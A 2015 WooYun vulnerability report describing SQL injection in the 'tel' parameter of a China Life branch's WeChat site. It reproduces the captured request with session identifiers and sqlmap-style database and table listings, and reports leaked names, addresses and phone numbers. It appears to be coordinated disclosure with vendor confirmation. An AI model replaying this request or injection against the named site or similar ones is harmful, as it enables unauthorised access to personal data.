当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145390

漏洞标题:保险安全之中国人寿某分公司存在sql注入可导致大量用户姓名/地址/手机号等泄漏

相关厂商:中国人寿

漏洞作者: Martial

提交时间:2015-10-09 14:27

修复时间:2015-11-24 08:40

公开时间:2015-11-24 08:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-20: 细节向核心白帽子及相关领域专家公开
2015-10-30: 细节向普通白帽子公开
2015-11-09: 细节向实习白帽子公开
2015-11-24: 细节向公众公开

简要描述:

坑人的队友

详细说明:

微信端 国寿财险唐山中支

3.jpg


点击微官网
抓到一处数据包

POST /weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY HTTP/1.1
Host: www.winadd.cn
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://www.winadd.cn
Content-Length: 94
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_0 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13A342 MicroMessenger/6.3.1 NetType/WIFI Language/zh_CN
Referer: http://www.winadd.cn/weixin/index.php?g=Wap&m=Userinfo&a=index&token=huxrkk1428376877&wecha_id=oxT0iuGdNJkw4kNv-lefTbezX-JY
Cookie: PHPSESSID=90b06811abbe786a7065f3fe860f90c7
wechaname=&tel=13012345678&truename=%E7%8E%8B%E5%B8%85&qq=&sex=1&birthday=2002033&action=index


注入参数是tel
大量数据库

available databases [9]:
[*] boyacms
[*] byhh-weixin
[*] byhh-weixinnew
[*] byhh_weixin_demo
[*] information_schema
[*] iwebmall
[*] mysql
[*] weixin
[*] x25gbk


看下当前数据库的表

Database: byhh-weixin
[138 tables]
+--------------------------+
| wx_access |
| wx_access_token |
| wx_activity |
| wx_address |
| wx_address_danyuan |
| wx_address_loupan |
| wx_adma |
| wx_alipay_config |
| wx_api |
| wx_areply |
| wx_article |
| wx_autumns_box |
| wx_autumns_ip |
| wx_autumns_open |
| wx_canyin_yaoqing |
| wx_canyin_yaoqing_cart |
| wx_case |
| wx_catemenu |
| wx_cehua |
| wx_classify |
| wx_company |
| wx_diymen_class |
| wx_diymen_set |
| wx_dream |
| wx_feyin |
| wx_feyin_record |
| wx_flash |
| wx_function |
| wx_games |
| wx_games_record |
| wx_home |
| wx_hongbao |
| wx_hongbao_exchange |
| wx_hongbao_log |
| wx_hongbao_prize |
| wx_hongbao_reward |
| wx_hongbao_zhuli_log |
| wx_host |
| wx_host_list_add |
| wx_host_order |
| wx_hots |
| wx_hotspinglun |
| wx_hotuser |
| wx_img |
| wx_indent |
| wx_jingpai |
| wx_jingpai_record |
| wx_jsapi_ticket |
| wx_kaiyedl |
| wx_keyword |
| wx_leitai_expense |
| wx_lightapp |
| wx_lightapp_detail |
| wx_links |
| wx_liuyan |
| wx_lottery |
| wx_lottery_bound |
| wx_lottery_record |
| wx_marrycard |
| wx_marrycard_wish |
| wx_member |
| wx_member_card_contact |
| wx_member_card_coupon |
| wx_member_card_create |
| wx_member_card_exchange |
| wx_member_card_info |
| wx_member_card_integral |
| wx_member_card_set |
| wx_member_card_sign |
| wx_member_card_vip |
| wx_membercard |
| wx_membercard_duihuan |
| wx_membercard_record |
| wx_membercard_user |
| wx_menuplus |
| wx_nearby_user |
| wx_node |
| wx_open_tab |
| wx_order |
| wx_ordering_class |
| wx_ordering_set |
| wx_other |
| wx_panorama |
| wx_photo |
| wx_photo_list |
| wx_product |
| wx_product_cart |
| wx_product_cart_list |
| wx_product_cat |
| wx_product_diningtable |
| wx_qixi_question |
| wx_qixi_shop_question |
| wx_qixi_userinfo |
| wx_qixi_userinfo_lottery |
| wx_recognition |
| wx_recognition_record |
| wx_red_packet |
| wx_red_packet_exchange |
| wx_red_packet_log |
| wx_red_packet_prize |
| wx_red_packet_reward |
| wx_rekeyword |
| wx_reply_info |
| wx_requestdata |
| wx_role |
| wx_role_user |
| wx_selfform |
| wx_selfform_input |
| wx_selfform_value |
| wx_site |
| wx_site_plugmenu |
| wx_snccode |
| wx_system_info |
| wx_table_record |
| wx_taobao |
| wx_team |
| wx_team_tags |
| wx_text |
| wx_token_open |
| wx_token_open_div |
| wx_user |
| wx_user_group |
| wx_user_request |
| wx_userinfo |
| wx_users |
| wx_voiceresponse |
| wx_weather |
| wx_wecha_user |
| wx_wecha_userinfo |
| wx_wechat_group |
| wx_wechat_group_list |
| wx_wifi_relation |
| wx_wifi_token |
| wx_world_cup_date |
| wx_world_cup_lottery |
| wx_world_cup_name |
| wx_world_cup_record |
| wx_wxuser |
+--------------------------+


涉及的信息

1.jpg


跑几个看下

2.jpg

漏洞证明:

1.jpg

修复方案:

过滤或者换个队友

版权声明:转载请注明来源 Martial@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-10 08:39

厂商回复:

谢谢。

最新状态:

暂无